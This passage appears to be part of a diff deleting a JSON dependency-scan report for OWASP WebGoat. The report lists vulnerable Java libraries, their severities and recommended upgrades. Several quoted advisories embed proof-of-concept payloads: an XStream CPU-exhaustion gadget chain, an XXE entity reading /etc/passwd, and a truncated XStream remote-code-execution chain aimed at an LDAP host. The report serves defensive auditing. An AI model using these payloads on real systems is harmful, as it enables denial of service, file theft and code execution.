-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003cis class='java.io.ByteArrayInputStream'\u003e\r\n            \u003cbuf\u003e\u003c/buf\u003e\r\n            \u003cpos\u003e-2147483648\u003c/pos\u003e\r\n            \u003cmark\u003e0\u003c/mark\u003e\r\n            \u003ccount\u003e0\u003c/count\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21341.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000000f-0000-4000-8000-00000000000f",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 240
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "0000000f-0000-4000-8000-00000000000f",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000000f-0000-4000-8000-00000000000f",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "EPL-1.0 license",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.asciidoctor:asciidoctorj",
-                  "version": "2.5.10"
-                },
-                {
-                  "name": "org.jruby:jruby",
-                  "version": "9.4.3.0"
-                },
-                {
-                  "name": "org.jruby:jruby-base",
-                  "version": "9.4.3.0"
-                },
-                {
-                  "name": "org.jruby:dirgra",
-                  "version": "0.3"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000010-0000-4000-8000-000000000010",
-          "locations": [
-            {
-              "package": {
-                "name": "org.jruby:dirgra",
-                "version": "0.3"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {},
-          "title": "EPL-1.0 license"
-        },
-        "id": "00000010-0000-4000-8000-000000000010",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\r\n[`com.thoughtworks.xstream:xstream`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xstream%22) is a simple library to serialize objects to XML and back again.\r\nMultiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.\r\n\r\n## Details\r\n\r\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\r\n   \u003cusername\u003eJohn\u003c/username\u003e\r\n\u003c/xml\u003e\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\r\n\u003c!DOCTYPE foo [\r\n   \u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\" \u003e]\u003e\r\n   \u003cusername\u003e\u0026xxe;\u003c/username\u003e\r\n\u003c/xml\u003e\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674)\r\n- [OSS Security](http://www.openwall.com/lists/oss-security/2016/03/28/1)\r\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/25)",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000011-0000-4000-8000-000000000011",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 139
-            }
-          },
-          "title": "XML External Entity (XXE) Injection"
-        },
-        "id": "00000011-0000-4000-8000-000000000011",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.9"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000011-0000-4000-8000-000000000011",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.36.Final, 2.3.17.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/ce5182c37376982ef0abee34fce0d8c0aab0fab8)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d0c82ba6d13fb03da83174641a37fe15990607a7)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000012-0000-4000-8000-000000000012",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 77
-            }
-          },
-          "title": "Race Condition"
-        },
-        "id": "00000012-0000-4000-8000-000000000012",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.2.10"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.17.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000012-0000-4000-8000-000000000012",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework.security:spring-security-web](https://mvnrepository.com/artifact/org.springframework.security/spring-security-web) is a package within Spring Security that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n## Remediation\nUpgrade `org.springframework.security:spring-security-web` to version 6.1.7, 6.2.2 or higher.\n## References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-security",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.security:spring-security-web",
-                  "version": "6.1.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000013-0000-4000-8000-000000000013",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework.security:spring-security-web",
-                "version": "6.1.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 128
-            }
-          },
-          "title": "Authentication Bypass"
-        },
-        "id": "00000013-0000-4000-8000-000000000013",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-security",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "org.springframework.security:spring-security-web",
-                          "version": "6.1.7"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000013-0000-4000-8000-000000000013",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n      \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n        \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n        \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n        \u003cbodyParts/\u003e\r\n        \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n          \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n          \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n            \u003csoapPart/\u003e\r\n            \u003cmm\u003e\r\n              \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                \u003caliases class='com.sun.jndi.ldap.LdapSearchEnumeration'\u003e\r\n                  \u003clistArg class='javax.naming.CompoundName' serialization='custom'\u003e\r\n                    \u003cjavax.naming.CompoundName\u003e\r\n                      \u003cproperties/\u003e\r\n                      \u003cint\u003e1\u003c/int\u003e\r\n                      \u003cstring\u003eysomap\u003c/string\u003e\r\n                    \u003c/javax.naming.CompoundName\u003e\r\n                  \u003c/listArg\u003e\r\n                  \u003ccleaned\u003efalse\u003c/cleaned\u003e\r\n                  \u003cres\u003e\r\n                    \u003cmsgId\u003e0\u003c/msgId\u003e\r\n                    \u003cstatus\u003e0\u003c/status\u003e\r\n                  \u003c/res\u003e\r\n                  \u003cenumClnt\u003e\r\n                    \u003cisLdapv3\u003efalse\u003c/isLdapv3\u003e\r\n                    \u003creferenceCount\u003e0\u003c/referenceCount\u003e\r\n                    \u003cpooled\u003efalse\u003c/pooled\u003e\r\n                    \u003cauthenticateCalled\u003efalse\u003c/authenticateCalled\u003e\r\n                  \u003c/enumClnt\u003e\r\n                  \u003climit\u003e1\u003c/limit\u003e\r\n                  \u003cposn\u003e0\u003c/posn\u003e\r\n                  \u003chomeCtx\u003e\r\n                    \u003c__contextType\u003e0\u003c/__contextType\u003e\r\n                    \u003cport__number\u003e1099\u003c/port__number\u003e\r\n                    \u003chostname\u003e127.0.0.1\u003c/hostname\u003e\r\n                    \u003cclnt reference='../../enumClnt'/\u003e\r\n                    \u003chandleReferrals\u003e0\u003c/handleReferrals\u003e\r\n                    \u003chasLdapsScheme\u003etrue\u003c/hasLdapsScheme\u003e\r\n                    \u003cnetscapeSchemaBug\u003efalse\u003c/netscapeSchemaBug\u003e\r\n                    \u003creferralHopLimit\u003e0\u003c/referralHopLimit\u003e\r\n                    \u003cbatchSize\u003e0\u003c/batchSize\u003e\r\n                    \u003cdeleteRDN\u003efalse\u003c/deleteRDN\u003e\r\n                    \u003ctypesOnly\u003efalse\u003c/typesOnly\u003e\r\n                    \u003cderefAliases\u003e0\u003c/derefAliases\u003e\r\n                    \u003caddrEncodingSeparator/\u003e\r\n                    \u003cconnectTimeout\u003e0\u003c/connectTimeout\u003e\r\n                    \u003creadTimeout\u003e0\u003c/readTimeout\u003e\r\n                    \u003cwaitForReply\u003efalse\u003c/waitForReply\u003e\r\n                    \u003creplyQueueSize\u003e0\u003c/replyQueueSize\u003e\r\n                    \u003cuseSsl\u003efalse\u003c/useSsl\u003e\r\n                    \u003cuseDefaultPortNumber\u003efalse\u003c/useDefaultPortNumber\u003e\r\n                    \u003cparentIsLdapCtx\u003efalse\u003c/parentIsLdapCtx\u003e\r\n                    \u003chopCount\u003e0\u003c/hopCount\u003e\r\n                    \u003cunsolicited\u003efalse\u003c/unsolicited\u003e\r\n                    \u003csharable\u003efalse\u003c/sharable\u003e\r\n                    \u003cenumCount\u003e1\u003c/enumCount\u003e\r\n                    \u003ccloseRequested\u003efalse\u003c/closeRequested\u003e\r\n                  \u003c/homeCtx\u003e\r\n                  \u003cmore\u003etrue\u003c/more\u003e\r\n                  \u003chasMoreCalled\u003etrue\u003c/hasMoreCalled\u003e\r\n                  \u003cstartName class='javax.naming.ldap.LdapName' serialization='custom'\u003e\r\n                    \u003cjavax.naming.ldap.LdapName\u003e\r\n                      \u003cdefault/\u003e\r\n                      \u003cstring\u003euid=ysomap,ou=oa,dc=example,dc=com\u003c/string\u003e\r\n                    \u003c/javax.naming.ldap.LdapName\u003e\r\n                  \u003c/startName\u003e\r\n                  \u003csearchArgs\u003e\r\n                    \u003cname class='javax.naming.CompoundName' reference='../../listArg'/\u003e\r\n                    \u003cfilter\u003eysomap\u003c/filter\u003e\r\n                    \u003ccons\u003e\r\n                      \u003csearchScope\u003e1\u003c/searchScope\u003e\r\n                      \u003ctimeLimit\u003e0\u003c/timeLimit\u003e\r\n                      \u003cderefLink\u003efalse\u003c/derefLink\u003e\r\n                      \u003creturnObj\u003etrue\u003c/returnObj\u003e\r\n                      \u003ccountLimit\u003e0\u003c/countLimit\u003e\r\n                    \u003c/cons\u003e\r\n                    \u003creqAttrs/\u003e\r\n                  \u003c/searchArgs\u003e\r\n                  \u003centries\u003e\r\n                    \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                      \u003cDN\u003euid=songtao.xu,ou=oa,dc=example,dc=com\u003c/DN\u003e\r\n                      \u003cattributes class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                        \u003cdefault\u003e\r\n                          \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                        \u003c/default\u003e\r\n        ",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000014-0000-4000-8000-000000000014",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
-        },
-        "id": "00000014-0000-4000-8000-000000000014",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000014-0000-4000-8000-000000000014",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the `logback.xml` configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.5.19 or higher.\n## References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7)\n- [Release Notes](https://logback.qos.ch/news.html#1.5.19)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                },
-                {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000015-0000-4000-8000-000000000015",
-          "locations": [
-            {
-              "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 41
-            }
-          },
-          "title": "External Initialization of Trusted Variables or Data Stores"
-        },
-        "id": "00000015-0000-4000-8000-000000000015",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.4.11"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.4.11"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.4.11"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.5.20"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-core",
-                          "version": "1.5.20"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000015-0000-4000-8000-000000000015",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.2.13, 1.3.12, 1.4.12 or higher.\n## References\n- [Changelog](https://logback.qos.ch/news.html#1.3.12)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                },
-                {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000016-0000-4000-8000-000000000016",
-          "locations": [
-            {
-              "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 80
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "00000016-0000-4000-8000-000000000016",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.4.14"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-core",
-                          "version": "1.4.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
